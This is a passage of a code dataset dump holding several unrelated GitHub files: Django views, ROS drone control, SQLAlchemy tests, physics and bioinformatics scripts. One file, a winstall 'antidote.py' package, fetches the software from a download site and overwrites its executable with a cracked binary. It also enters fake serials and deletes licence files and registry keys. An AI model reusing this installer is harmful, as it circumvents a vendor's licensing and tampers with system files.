self.finish_time or self.num_solved_questions == self.num_questions\n\n @classmethod\n def user_check_current_test(cls, user):\n return cls.current_tests[user.username] if user.username in cls.current_tests else None\n\n @classmethod\n def get_test(cls, user):\n #don't use setdefault here\n if user.username not in cls.current_tests:\n cls.current_tests[user.username] = Test(user)\n return cls.current_tests[user.username]\n\n\n@login_required\ndef home(request):\n mydict = {}\n mydict['test_running'] = Test.user_check_current_test(request.user)\n return render_to_response('home.html', mydict, context_instance=RequestContext(request))\n\n\n@login_required\ndef continue_test(request):\n if request.method == 'GET':\n raise Http404\n test = Test.get_test(request.user)\n if 'option_checked' in request.POST and not test.finished:\n test.solve_current(int(request.POST.get('option_checked')))\n result_dict = dict(finish_time='new Date(\"%s\")' % test.finish_time.ctime(), num_solved_questions=test.num_solved_questions, num_questions=test.num_questions)\n if test.finished:\n result_dict['finished'] = True\n result_dict['score'] = test.score\n del Test.current_tests[request.user.username]\n else:\n result_dict['current_question'] = test.current_question.to_dict()\n return HttpResponse(json.dumps(result_dict))\n","repo_name":"prongs/OnlineExam","sub_path":"exam/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"33945330028","text":"#! /usr/bin/env python\n\nimport rospy\nimport mavros\nimport numpy as np\nfrom geometry_msgs.msg import PoseStamped\nfrom mavros_msgs.msg import State\nfrom mavros_msgs.srv import CommandBool, CommandBoolRequest, SetMode, SetModeRequest\n\nclass Drone:\n def __init__(self):\n rospy.wait_for_service(\"/mavros/set_mode\")\n rospy.wait_for_service(\"/mavros/cmd/arming\")\n \n\n self.state_sub = rospy.Subscriber(\"mavros/state\", State, callback = self.state_cb)\n self.local_pose_sub = rospy.Subscriber('/mavros/local_position/pose', PoseStamped, self.pose_cb)\n self.local_pos_pub = rospy.Publisher(\"mavros/setpoint_position/local\", PoseStamped, queue_size=10)\n self.arming_client = rospy.ServiceProxy(\"mavros/cmd/arming\", CommandBool)\n self.set_mode_client = rospy.ServiceProxy(\"mavros/set_mode\", SetMode)\n \n self.current_state = None\n self.pose = None\n self.yaw = 0\n self.hz = 20\n self.rate = rospy.Rate(self.hz)\n\n\n def state_cb(self, msg):\n self.current_state = msg\n\n def pose_cb(self, msg):\n self.pose = [msg.pose.position.x, msg.pose.position.y, msg.pose.position.z ]\n\n def arm(self):\n\n for i in range(100):\n self.publish_pose([0,0,-1])\n self.rate.sleep()\n # Wait for Flight Controller connection\n\n while(not rospy.is_shutdown() and not self.current_state.connected):\n self.rate.sleep()\n\n offb_set_mode = SetModeRequest()\n offb_set_mode.custom_mode = 'OFFBOARD'\n\n arm_cmd = CommandBoolRequest()\n arm_cmd.value = True\n\n last_req = rospy.Time.now()\n\n while(not rospy.is_shutdown()):\n\n if(self.current_state.mode != \"OFFBOARD\" and (rospy.Time.now() - last_req) > rospy.Duration(2.0)):\n if(self.set_mode_client.call(offb_set_mode).mode_sent == True):\n rospy.loginfo(\"OFFBOARD enabled\")\n\n last_req = rospy.Time.now()\n else:\n if(not self.current_state.armed and (rospy.Time.now() - last_req) > rospy.Duration(2.0)):\n if(self.arming_client.call(arm_cmd).success == True):\n rospy.loginfo(\"Vehicle armed\")\n last_req = 
rospy.Time.now()\n if self.current_state.armed:\n # Update timestamp and publish sp \n break\n self.publish_pose([0,0,-1])\n self.rate.sleep()\n \n def publish_pose(self, position,yaw = np.pi/2):\n new_pose = PoseStamped()\n new_pose.pose.position.x = position[0]\n new_pose.pose.position.y = position[1]\n new_pose.pose.position.z = position[2]\n self.local_pos_pub.publish(new_pose)\n\n def takeoff(self, alt):\n print(\"Takeoff...\")\n position = self.pose\n while self.pose[2] < alt:\n position[2] += 0.1\n self.publish_pose(position)\n self.rate.sleep()\n\n\n \n\n\n\n ","repo_name":"aJimenez19037/CDUS-Cam-Node","sub_path":"catkin_ws/src/offboard_py/scripts/drone2.py","file_name":"drone2.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"934728891","text":"from unittest import TestCase\n\nfrom Services.TransactionService import TransactionService as TS\nfrom Services.DepartmentService import DepartmentService as DS\nfrom Services.EquipmentService import EquipmentService as EqS\nfrom Services.EmployeeService import EmployeeService as EmS\nfrom Services.ReceiptService import ReceiptService as RS\n\nfrom Models.Transaction import Transaction\nfrom Models.Department import Department\nfrom Models.Equipment import Equipment\nfrom Models.Employee import Employee\nfrom Models.Receipt import Receipt\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nimport datetime\n\ndatabase = create_engine('postgres://localhost:5432/myDatabase')\ndatabase.connect()\n\nnow = datetime.datetime.now()\ndate = now.strftime(\"%Y\") + \"-\" + now.strftime(\"%m\") + \"-\" + now.strftime(\"%d\")\n\nSession = sessionmaker(database)\nsession = Session()\n\ndefault_rec = Receipt(id=\"ID\", supplement=\"IDK\", year=2020)\nRS.add_receipt(session=session, receipt=default_rec)\n\ndefault_eq = Equipment(id=1, price=22000, model=\"Skjerm\", buy_date=date,\n receipt_id=\"ID\", description=\"Solid work\", note=\"Do not drop\")\nEqS.add_equipment(session=session, equipment=default_eq)\n\ndefault_dep = Department(id=1, country=\"Norway\", unit=\"Bergen\")\nDS.add_department(session=session, department=default_dep)\n\ndefault_emp = Employee(id=\"E1\", name=\"Smiedth\", department_id=default_dep.id)\nEmS.add_employee(session=session, employee=default_emp)\n\ndefault_emp2 = Employee(id=\"E4\", name=\"Jon\", department_id=default_dep.id)\nEmS.add_employee(session=session, employee=default_emp2)\n\n\nclass TestTransactionService(TestCase):\n def test_add_transaction(self):\n trans = Transaction(employee_id=\"E1\", equipment_id=1)\n self.assertTrue(TS.add_transaction(session=session, transaction=trans))\n self.assertTrue(TS.add_transaction(session=session, employee_id=\"E1\", equipment_id=1))\n self.assertFalse(TS.add_transaction(session=session, employee_id=0, equipment_id=1))\n\n def test_update_transaction(self):\n trans = Transaction(id=10, employee_id=\"E1\", equipment_id=1)\n TS.add_transaction(session=session, transaction=trans)\n self.assertEqual(trans, TS.find_transaction(session, 10))\n TS.update_transaction(session, 10, 1, \"E4\")\n self.assertNotEqual(\"E1\", TS.find_transaction(session, 10).employee_id)\n\n def test_get_all_transactions(self):\n trans = Transaction(id=40, employee_id=\"E4\", equipment_id=1)\n TS.add_transaction(session=session, transaction=trans)\n trans_list = TS.get_all_transactions(session)\n self.assertEqual(trans, 
trans_list.all().pop())\n","repo_name":"h181198/scoutgaming","sub_path":"Test/Services/test_transactionService.py","file_name":"test_transactionService.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"3463664971","text":"import os\nimport sys\nimport math\nimport json\nimport ROOT\nimport random\n\nfrom PhysicsTools.NanoAODTools.postprocessing.framework.datamodel import Collection\nfrom PhysicsTools.NanoAODTools.postprocessing.framework.eventloop import Module\n\nfrom utils import deltaR\n\nclass JetSelection(Module):\n\n def __init__(\n self,\n inputCollection = lambda event: Collection(event, \"Jet\"),\n leptonCollection = lambda event: [],\n outputName = \"centralJets\",\n jetMinPt = 30.,\n jetMaxEta = 2.4,\n dRCleaning = 0.4,\n flagDA = False,\n addSize = True,\n storeKinematics=['pt','eta'],\n globalOptions={\"isData\":False},\n jetId = 0\n ):\n self.globalOptions = globalOptions\n self.inputCollection = inputCollection\n self.leptonCollection = leptonCollection\n self.outputName = outputName\n self.jetMinPt = jetMinPt\n self.jetMaxEta = jetMaxEta\n self.dRCleaning = dRCleaning\n self.flagDA = flagDA\n self.addSize = addSize\n self.storeKinematics = storeKinematics\n self.jetId = jetId\n \n \n def beginJob(self):\n pass\n \n def endJob(self):\n pass\n \n def beginFile(self, inputFile, outputFile, inputTree, wrappedOutputTree):\n self.out = wrappedOutputTree\n if self.addSize:\n self.out.branch(\"n\"+self.outputName,\"I\")\n self.out.branch(\"nfailedId\"+self.outputName,\"I\")\n if self.flagDA:\n self.out.branch(self.outputName+\"_forDA\",\"F\",lenVar=\"nJet\")\n \n for variable in self.storeKinematics:\n self.out.branch(self.outputName+\"_\"+variable,\"F\",lenVar=\"n\"+self.outputName)\n\n \n def endFile(self, inputFile, outputFile, inputTree, wrappedOutputTree):\n pass\n \n def analyze(self, event):\n \"\"\"process event, return True (go to next module) or False (fail, go to next event)\"\"\"\n jets = self.inputCollection(event)\n origJets = Collection(event,\"Jet\")\n selectedJets = []\n unselectedJets = []\n \n if self.flagDA:\n flagsDA = [0.]*event.nJet\n \n failedId = 0\n \n for jet in jets:\n #if self.flagDA:\n # print \"event=%i, index=%i, pt=%.4f, eta=%.4f, \"%(event._entry,jet._index,origJets[jet._index].pt,origJets[jet._index].eta)\n if jet.pt>self.jetMinPt and math.fabs(jet.eta)self.jetId):\n leptons = self.leptonCollection(event)\n if self.dRCleaning>0. and leptons!=None and len(leptons)>0:\n mindr = min(map(lambda lepton: deltaR(lepton,jet),leptons))\n if mindr str:\n return Path().joinpath(os.environ.get(\"PROGRAMFILES(X86)\"), \"Druide\")\n\n @cached_property\n def package_type(self) -> str:\n return \"Office\"\n\n @cached_property\n def curr_version(self) -> str:\n return get_version(self.package_root.joinpath(\"Antidote 10\", \"Application\", \"Bin64\", \"Antidote.exe\"))\n\n @cached_property\n def last_version(self) -> str:\n address = \"https://filecr.com/windows/antidote/\"\n content = requests.get(address).text\n return re.search(\"
Antidote (.*)
\", content).group(1).replace(\" \", \".\").replace(\"v\", \"\")\n\n async def download(self) -> str:\n return await from_filecr(\"https://filecr.com/windows/antidote/\")\n\n async def install(self) -> None:\n if not self.is_installed:\n self._remove_leftovers()\n archive = await self.download()\n destination = extract_dir(archive, password=\"123\")\n setup_dir = Path().joinpath(destination, \"Setup - retail\", \"msi\", \"druide\")\n subprocess.run(f'msiexec.exe /qn /i \"{setup_dir}\\\\Antidote10.msi\" TRANSFORMS=\"{setup_dir}\\\\Antidote10-Interface-en.mst\"')\n subprocess.run(f'msiexec.exe /qn /i \"{setup_dir}\\\\Antidote10-Module-francais.msi\" TRANSFORMS=\"{setup_dir}\\\\Antidote10-Module-francais-Interface-en.mst\"')\n subprocess.run(f'msiexec.exe /qn /i \"{setup_dir}\\\\Antidote10-English-module.msi\" TRANSFORMS=\"{setup_dir}\\\\Antidote10-English-module-Interface-en.mst\"')\n subprocess.run(f'msiexec.exe /qn /i \"{setup_dir}\\\\Antidote-Connectix10.msi\" TRANSFORMS=\"{setup_dir}\\\\Antidote-Connectix10-Interface-en.mst\"')\n updates_dir = os.path.join(destination, \"Updates\")\n for msp_file in glob.glob(os.path.join(updates_dir, \"*.msp\")):\n subprocess.run(f'msiexec.exe /qn /p \"{msp_file}\"')\n shutil.copy(Path().joinpath(destination, \"Crack\", \"Antidote.exe\"), self.package_root.joinpath(\"Antidote 10\", \"Application\", \"Bin64\", \"Antidote.exe\"))\n os.system(\"taskkill /f /im chrome.exe\")\n self._post_install()\n \n def _hide_connectix_icon(self) -> None:\n subprocess.Popen(self.package_root.joinpath(\"Connectix 10\", \"Application\", \"Bin64\", \"Connectix.exe\"))\n win1 = Desktop(backend=\"uia\").window(title=\"Connectix\")\n win1.wait(\"visible\", timeout=20)\n win1.set_focus()\n keyboard.send_keys(\"^R\")\n win2 = Desktop(backend=\"uia\").window(title_re=\"Options.*\")\n win2.wait(\"visible\")\n win2.set_focus()\n keyboard.send_keys(\"{TAB 4}\")\n keyboard.send_keys(\"{SPACE}\")\n keyboard.send_keys(\"{TAB 10}\")\n keyboard.send_keys(\"{SPACE}\")\n win1.close()\n\n def _post_install(self) -> None:\n subprocess.Popen(self.package_root.joinpath(\"Antidote 10\", \"Application\", \"Bin64\", \"Antidote.exe\"))\n # Handle the 1st window.\n win1 = Desktop(backend=\"uia\").window(class_name=\"Qt5QWindowIcon\")\n win1.wait(\"visible\", timeout=20)\n win1.set_focus()\n link = win1[\"Enter a serial number…\"]\n link.click_input()\n # Handle the 2nd window.\n time.sleep(3)\n win2 = Desktop(backend=\"uia\").window(class_name=\"Qt5QWindowIcon\")\n win2.wait(\"visible\")\n win2.set_focus()\n keyboard.send_keys(\"John\")\n keyboard.send_keys(\"{TAB}\")\n keyboard.send_keys(\"Doe\")\n keyboard.send_keys(\"{TAB}\")\n keyboard.send_keys(\"{TAB}\")\n keyboard.send_keys(\"123-456-789-012\")\n keyboard.send_keys(\"{SPACE}\")\n # Handle the 3rd window.\n time.sleep(3)\n win3 = Desktop(backend=\"uia\").window(class_name=\"Qt5QWindowIcon\")\n win3.wait(\"visible\")\n win3.set_focus()\n keyboard.send_keys(\"FV-12345-67890-1234-67890-123455\")\n keyboard.send_keys(\"{TAB}\")\n keyboard.send_keys(\"{TAB}\")\n keyboard.send_keys(\"{SPACE}\")\n # Handle the 4th window.\n time.sleep(3)\n win4 = Desktop(backend=\"uia\").Antidote\n win4.wait(\"visible\")\n win4.set_focus()\n keyboard.send_keys(\"{SPACE}\")\n # Handle the 5th window.\n time.sleep(3)\n win5 = Desktop(backend=\"uia\").window(title_re=\"Personalize.*\")\n win5.wait(\"visible\")\n win5.set_focus()\n keyboard.send_keys(\"{TAB}\")\n keyboard.send_keys(\"{TAB}\")\n keyboard.send_keys(\"{SPACE}\")\n keyboard.send_keys(\"{TAB}\")\n 
keyboard.send_keys(\"{SPACE}\")\n # Handle the 6th window.\n time.sleep(3)\n win6 = Desktop(backend=\"uia\").window(title_re=\"Personalize.*\")\n win6.wait(\"visible\")\n win6.set_focus()\n keyboard.send_keys(\"{SPACE}\")\n keyboard.send_keys(\"{TAB}\")\n keyboard.send_keys(\"{TAB}\")\n keyboard.send_keys(\"{ENTER}\")\n keyboard.send_keys(\"{TAB}\")\n keyboard.send_keys(\"{SPACE}\")\n keyboard.send_keys(\"{TAB}\")\n keyboard.send_keys(\"{SPACE}\")\n keyboard.send_keys(\"{TAB}\")\n keyboard.send_keys(\"{SPACE}\")\n # Kill all related processes.\n time.sleep(3)\n os.system(\"taskkill /f /im Antidote.exe\")\n os.system(\"taskkill /f /im Connectix.exe\")\n os.system(\"taskkill /f /im AgentAntidote.exe\")\n os.system(\"taskkill /f /im AgentConnectix.exe\")\n time.sleep(3)\n # Hide the connectix icon from taskbar.\n self._hide_connectix_icon()\n\n def _remove_leftovers(self) -> None:\n if os.path.exists(\"C:/Windows/AM213468.bin\"):\n os.remove(\"C:/Windows/AM213468.bin\")\n if os.path.exists(\"C:/Windows/system32/WS022057.bin\"):\n os.remove(\"C:/Windows/system32/WS022057.bin\")\n purge_keys(winreg.HKEY_CURRENT_USER, \"Software\\Druide informatique inc.\")\n purge_keys(winreg.HKEY_LOCAL_MACHINE, \"Software\\Druide informatique inc.\")\n shutil.rmtree(Path().joinpath(os.environ[\"USERPROFILE\"], \"AppData\", \"Roaming\", \"Druide\"), ignore_errors=True)\n shutil.rmtree(self.package_root, ignore_errors=True)\n","repo_name":"lanzorg/winstall","sub_path":"winstall/packages/antidote.py","file_name":"antidote.py","file_ext":"py","file_size_in_byte":6538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"15701739443","text":"r\"\"\"Manual benchmarks for the Google Earth Engine backend for Xarray.\n\nThese are intended to always be run manually since they are more expensive test\nto run.\n\"\"\"\n\nimport cProfile\nimport os\nimport tempfile\nimport timeit\nfrom typing import List\n\nfrom absl import app\nimport numpy as np\nimport xarray\nimport xee\n\nimport ee\n\n\nREPEAT = 10\nLOOPS = 1\nPROFILE = False\n\n\ndef init_ee_for_tests():\n ee.Initialize(opt_url='https://earthengine-highvolume.googleapis.com')\n\n\ndef open_dataset() -> None:\n _ = xarray.open_dataset(\n 'NASA/GPM_L3/IMERG_V06', engine=xee.EarthEngineBackendEntrypoint\n )\n\n\ndef open_and_chunk() -> None:\n ds = xarray.open_dataset(\n 'NASA/GPM_L3/IMERG_V06',\n crs='EPSG:4326',\n scale=0.25,\n chunks={'index': 24, 'width': 512, 'height': 512},\n engine=xee.EarthEngineBackendEntrypoint,\n )\n ds.chunk()\n\n\ndef open_and_write() -> None:\n with tempfile.TemporaryDirectory() as tmpdir:\n ds = xarray.open_dataset(\n 'NASA/GPM_L3/IMERG_V06',\n crs='EPSG:4326',\n scale=0.25,\n chunks={'time': 24, 'lon': 1440, 'lat': 720},\n engine=xee.EarthEngineBackendEntrypoint,\n )\n ds = ds.isel(time=slice(0, 24))\n ds.to_zarr(os.path.join(tmpdir, 'imerg.zarr'))\n\n\ndef main(_: List[str]) -> None:\n print('Initializing EE...')\n init_ee_for_tests()\n print(f'[{REPEAT} time(s) with {LOOPS} loop(s) each.]')\n for fn in ['open_dataset()', 'open_and_chunk()', 'open_and_write()']:\n if PROFILE:\n cProfile.run(fn)\n timer = timeit.Timer(fn, globals=globals())\n res = timer.repeat(REPEAT, number=LOOPS)\n avg, std, best, worst = np.mean(res), np.std(res), np.min(res), np.max(res)\n print(f'{fn}:avg={avg:.2f},std={std:.2f},best={best:.2f},worst={worst:.2f}')\n\n\nif __name__ == '__main__':\n 
app.run(main)\n","repo_name":"google/Xee","sub_path":"xee/micro_benchmarks.py","file_name":"micro_benchmarks.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"85"} +{"seq_id":"14344655866","text":"# program to calculate the total frequency of trinucleotide SSR motifs present in the coding region (CDS) of a particular gene\n\n#usage : python3 SSR_CDS_overlap.py Phyag_NZFS3770.tri_gene.txt Phyag_NZFS3770.ffn for organism Phytophthora agathicida isolate NZFS3770.\n# *.tri_gene.txt contains 2 columns: SSR motif and gene ids. This information was obtained from doing a bed intersection between SSR file and gff3 fiile.\n# *.ffn contains gene ids and coding (CDS) regions. the original file was modified by a bash script so that gene ids of .ffn files and .tri_gene_txt files have\n# the same format and can be matched \nimport pandas as pd\nimport sys\ndataframe1 = pd.read_csv(sys.argv[1], sep=\"\\t\", header=None)\nduplicate = dataframe1.drop_duplicates()\nduplicate.columns =['ID', 'motif']\n# with pd.option_context('display.max_rows', None, 'display.max_columns', None): # more options can be specified also\n# print(duplicate)\ndictionary_tri = {k: list(v) for k,v in duplicate.groupby(\"ID\")[\"motif\"]} \n#print (dictionary_tri)\nfrom Bio import SeqIO\ndictionary_ffn={}\ndictionary={}\nwith open(sys.argv[2]) as handle:\n for record in SeqIO.parse(handle, \"fasta\"):\n dictionary_ffn[record.id] = str(record.seq)\n# print(dictionary_ffn)\nfor search_key in dictionary_tri:\n res = [val for key, val in dictionary_ffn.items() if search_key==key]\n CDS_residue=''.join(res)\n record_seq_length = len(CDS_residue)\n for tri in dictionary_tri[search_key]:\n #print(tri)\n for k in range(0, record_seq_length, 3):\n tri1=CDS_residue[k:k+3]\n #print (tri,tri1)\n if tri1 in dictionary and tri==tri1: dictionary[tri1]+=1\n elif tri1 == tri: dictionary[tri1] =1\n\nimport operator\nsorted_d = dict( sorted(dictionary.items(), key=operator.itemgetter(0)))\ndf = pd.DataFrame.from_dict(sorted_d, orient ='index')\nprint(df)\n\n","repo_name":"computational-genomics-lab/scripts-for-SSR-project","sub_path":"Python-Scripts/SSR_CDS_overlap.py","file_name":"SSR_CDS_overlap.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"7146622055","text":"import json\nimport math\nimport pandas as pd\n\ndataset = pd.read_csv(\"dataset/dataset_TF\", sep=\"\\t\")\nidf = json.loads(open(\"dataset/dataset_IDF\").readlines()[0])\n\n#dataset.to_csv(\"dataset/teste\", sep=\"\\t\")\nidf_zero = []\nidf_list = []\n\nfor word in idf:\n if idf[word] == 0:\n idf_zero.append(word)\n else:\n idf_list.append(word)\nprint(len(idf_zero))\n\ndataset = dataset.drop(columns = idf_zero)\ndataset.to_csv(\"dataset/datset_drop_TF\", sep='\\t', index=False)\n\nidf_dataset = pd.DataFrame.from_dict(idf)\n\n'''l = len(dataset)\n\nfor i in range(l):\n print(i)\n aux = 0\n for word in idf_list:\n aux += 1\n print(aux)\n dataset.at[i, word] = dataset.iloc[i][word] * idf[word]\n\ndataset.to_csv(\"dataset/dataset_TFxIDF\", sep='\\t')'''","repo_name":"gabrielvmelo/Projeto-RI","sub_path":"classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"39939640027","text":"import psycopg2\nfrom psycopg2 import Error\nimport pandas as pd\nimport 
pandas.io.sql as psql\ntry:\n \n # DATABASE CONNECTION VARIABLES USED TO BE HERE BUT HAVE BEEN REMOVED\n\n cursor = connection.cursor()\n \n\n ## create table\n create_table_query = '''\n CREATE TABLE countrymeasures (ID SERIAL PRIMARY KEY NOT NULL, COUNTRY VARCHAR(80) NOT NULL, MEASURE VARCHAR(80) NOT NULL, DATE_START DATE, DATE_END DATE);\n '''\n cursor.execute(create_table_query)\n connection.commit()\n print(\"Table created successfully in PostgreSQL \")\n\n\n\n ## load dataset into table\n load_data_query = '''\n COPY countrymeasures(country, measure, date_start, date_end) FROM 'response_graph.csv' DELIMITER ',' NULL 'NA' CSV HEADER;\n '''\n cursor.execute(load_data_query)\n connection.commit()\n print(\"Dataset loaded successfully\")\n\n\n\n ## query data from database\n select_data_query = '''\n SELECT * FROM countrymeasures WHERE country = 'Denmark';\n '''\n cursor.execute(select_data_query)\n data = cursor.fetchall()\n for row in data:\n print(row)\n print(\"Data selected successfully in Database\")\n\n\n\nexcept (Exception, psycopg2.DatabaseError) as error :\n print (\"Error while creating PostgreSQL table\", error)\nfinally:\n #closing database connection.\n if(connection):\n cursor.close()\n connection.close()\n print(\"PostgreSQL connection is closed\")\n \n","repo_name":"MikkelTJensen/P5clone","sub_path":"first_iteration/dbpythontest/dbconnectiontest.py","file_name":"dbconnectiontest.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"34805506025","text":"\"\"\"\nfunctions to access the data dictionary in a clearer way\n\"\"\"\n\nimport os\nimport toolz as tz\nfrom bcbio.utils import file_exists\nfrom bcbio.log import logger\nimport sys\n\nLOOKUPS = {\n \"config\": {\"keys\": ['config']},\n \"tmp_dir\": {\"keys\": ['config', 'resources', 'tmp', 'dir']},\n \"num_cores\": {\"keys\": ['config', 'algorithm', 'num_cores'],\n \"default\": 1},\n \"svprioritize\": {\"keys\": ['config', 'algorithm', 'svprioritize']},\n \"effects_transcripts\": {\"keys\": [\"config\", \"algorithm\", \"effects_transcripts\"], \"default\": \"all\"},\n \"genome_build\": {\"keys\": [\"genome_build\"]},\n \"gtf_file\": {\"keys\": ['genome_resources', 'rnaseq', 'transcripts'],\n \"checker\": file_exists},\n \"transcriptome_fasta\": {\"keys\": [\"config\", \"algorithm\", \"transcriptome_fasta\"],\n \"default\": None},\n \"singlecell_quantifier\": {\"keys\": [\"config\", \"algorithm\",\n \"singlecell_quantifier\"],\n \"default\": \"rapmap\"},\n \"positional_umi\": {\"keys\": [\"config\", \"algorithm\", \"positional_umi\"]},\n \"tx2gene\": {\"keys\": [\"tx2gene\"]},\n \"ref_file\": {\"keys\": [\"reference\", \"fasta\", \"base\"]},\n \"ref_file_compressed\": {\"keys\": [\"reference\", \"fastagz\", \"base\"]},\n \"ref_twobit\": {\"keys\": [\"reference\", \"twobit\"]},\n \"srna_gtf_file\": {\"keys\": ['genome_resources', 'srnaseq', 'srna_transcripts'],\n \"checker\": file_exists},\n \"srna_trna_file\": {\"keys\": ['genome_resources', 'srnaseq', 'trna_fasta'],\n \"checker\": file_exists},\n \"srna_mint_lookup\": {\"keys\": ['genome_resources', 'srnaseq', 'mint_lookup'],\n \"checker\": file_exists},\n \"srna_mint_space\": {\"keys\": ['genome_resources', 'srnaseq', 'mint_space'],\n \"checker\": file_exists},\n \"srna_mint_other\": {\"keys\": ['genome_resources', 'srnaseq', 'mint_other'],\n \"checker\": file_exists},\n \"mirdeep2_file\": {\"keys\": ['genome_resources', 'srnaseq', 'mirdeep2_fasta'],\n \"checker\": 
file_exists},\n \"mirbase_hairpin\": {\"keys\": ['genome_resources', 'srnaseq', 'mirbase_hairpin'],\n \"checker\": file_exists},\n \"mirbase_mature\": {\"keys\": ['genome_resources', 'srnaseq', 'mirbase_mature'],\n \"checker\": file_exists},\n \"gene_bed\": {\"keys\": ['genome_resources', 'rnaseq', 'gene_bed'],\n \"checker\": file_exists},\n \"work_dir\": {\"keys\": ['dirs', 'work']},\n \"sam_ref\": {\"keys\": [\"sam_ref\"]},\n \"disambiguate\": {\"keys\": [\"config\", \"algorithm\", \"disambiguate\"],\n \"default\": False},\n \"lane\": {\"keys\": [\"rgnames\", \"lane\"]},\n \"cores\": {\"keys\": [\"config\", \"algorithm\", \"num_cores\"], \"default\": 1},\n \"sample_name\": {\"keys\": ['rgnames', 'sample']},\n \"strandedness\": {\"keys\": ['config', 'algorithm', 'strandedness'],\n \"default\": \"unstranded\"},\n \"vcfanno\": {\"keys\": ['config', 'algorithm', 'vcfanno'], \"default\": []},\n \"analysis\": {\"keys\": [\"analysis\"]},\n \"square_vcf\": {\"keys\": ['square_vcf']},\n \"ploidy\": {\"keys\": ['config', 'algorithm', 'ploidy'], \"default\": 2},\n \"gender\": {\"keys\": [\"metadata\", \"sex\"], \"default\": \"\"},\n \"batch\": {\"keys\": [\"metadata\", \"batch\"]},\n \"mark_duplicates\": {\"keys\": [\"config\", \"algorithm\", \"mark_duplicates\"], \"default\": True},\n \"phenotype\": {\"keys\": [\"metadata\", \"phenotype\"], \"default\": \"\"},\n \"svclass\": {\"keys\": [\"metadata\", \"svclass\"], \"default\": \"\"},\n \"hetcaller\": {\"keys\": [\"config\", \"algorithm\", \"hetcaller\"]},\n \"variantcaller\": {\"keys\": ['config', 'algorithm', 'variantcaller']},\n \"svcaller\": {\"keys\": ['config', 'algorithm', 'svcaller'], \"default\": [], \"always_list\": True},\n \"jointcaller\": {\"keys\": ['config', 'algorithm', 'jointcaller']},\n \"hlacaller\": {\"keys\": ['config', 'algorithm', 'hlacaller']},\n \"recalibrate\": {\"keys\": ['config', 'algorithm', 'recalibrate'], \"default\": False},\n \"realign\": {\"keys\": ['config', 'algorithm', 'realign'], \"default\": False},\n \"peakcaller\": {\"keys\": ['config', 'algorithm', 'peakcaller'], \"default\": []},\n \"chip_method\": {\"keys\": ['config', 'algorithm', 'chip_method'], \"default\": \"chip\"},\n \"spikein_counts\": {\"keys\": [\"spikein_counts\"]},\n \"count_file\": {\"keys\": [\"count_file\"]},\n \"mirna_counts\": {\"keys\": [\"mirna_counts\"]},\n \"isomir_counts\": {\"keys\": [\"isomir_counts\"]},\n \"novel_mirna_counts\": {\"keys\": [\"novel_mirna_counts\"]},\n \"novel_isomir_counts\": {\"keys\": [\"novel_isomir_counts\"]},\n \"combined_counts\": {\"keys\": [\"combined_counts\"]},\n \"annotated_combined_counts\": {\"keys\": [\"annotated_combined_counts\"]},\n \"genome_context_files\": {\"keys\": [\"reference\", \"genome_context\"], \"default\": [], \"always_list\": True},\n \"viral_files\": {\"keys\": [\"reference\", \"viral\"], \"default\": [], \"always_list\": True},\n \"archive\": {\"keys\": [\"config\", \"algorithm\", \"archive\"], \"default\": [], \"always_list\": True},\n \"dexseq_gff\": {\"keys\": ['genome_resources', 'rnaseq', 'dexseq']},\n \"combined_fpkm\": {\"keys\": ['combined_fpkm']},\n \"combined_fpkm_isoform\": {\"keys\": ['combined_fpkm_isoform']},\n \"express_fpkm\": {\"keys\": ['express_fpkm']},\n \"express_tpm\": {\"keys\": ['express_tpm']},\n \"express_counts\": {\"keys\": ['express_counts']},\n \"isoform_to_gene\": {\"keys\": ['isoform_to_gene']},\n \"fusion_mode\": {\"keys\": ['config', 'algorithm', 'fusion_mode']},\n \"dexseq_counts\": {\"keys\": ['dexseq_counts']},\n \"description\": {\"keys\": 
['description']},\n \"aligner\": {\"keys\": ['config', 'algorithm', 'aligner']},\n \"bam_clean\": {\"keys\": ['config', 'algorithm', 'bam_clean']},\n \"platform\": {\"keys\": ['config', 'algorithm', 'platform'],\n \"default\": \"illumina\"},\n \"quality_format\": {\"keys\": ['config', 'algorithm', 'quality_format'],\n \"default\": \"standard\"},\n \"algorithm_qc\": {\"keys\": ['config', 'algorithm', 'qc'], \"default\": [], \"always_list\": True},\n \"summary_qc\": {\"keys\": ['summary', 'qc'], \"default\": {}},\n \"summary_metrics\": {\"keys\": ['summary', 'metrics'], \"default\": {}},\n \"adapters\": {\"keys\": ['config', 'algorithm', 'adapters'],\n \"default\": []},\n \"custom_trim\": {\"keys\": ['config', 'algorithm', 'custom_trim'],\n \"default\": []},\n \"species\": {\"keys\": ['config', 'algorithm', 'species'],\n \"default\": None},\n \"trim_reads\": {\"keys\": ['config', 'algorithm', 'trim_reads'],\n \"default\": None},\n \"trim_ends\": {\"keys\": ['config', 'algorithm', 'trim_ends'],\n \"default\": []},\n \"min_read_length\": {\"keys\": ['config', 'algorithm', 'min_read_length'],\n \"default\": 25},\n \"variation_resources\": {\"keys\": [\"genome_resources\", \"variation\"], \"default\": {}},\n \"qsig_file\": {\"keys\": ['genome_resources', 'variation', 'qsignature'],\n \"checker\": file_exists},\n \"mixup_check\": {\"keys\": [\"config\", \"algorithm\", \"mixup_check\"],\n \"default\": False},\n \"cufflinks_dir\": {\"keys\": ['cufflinks_dir']},\n \"stringtie_dir\": {\"keys\": ['stringtie_dir']},\n \"rsem\": {\"keys\": [\"config\", \"algorithm\", \"rsem\"], \"default\": False},\n \"transcriptome_align\": {\"keys\": [\"config\", \"algorithm\", 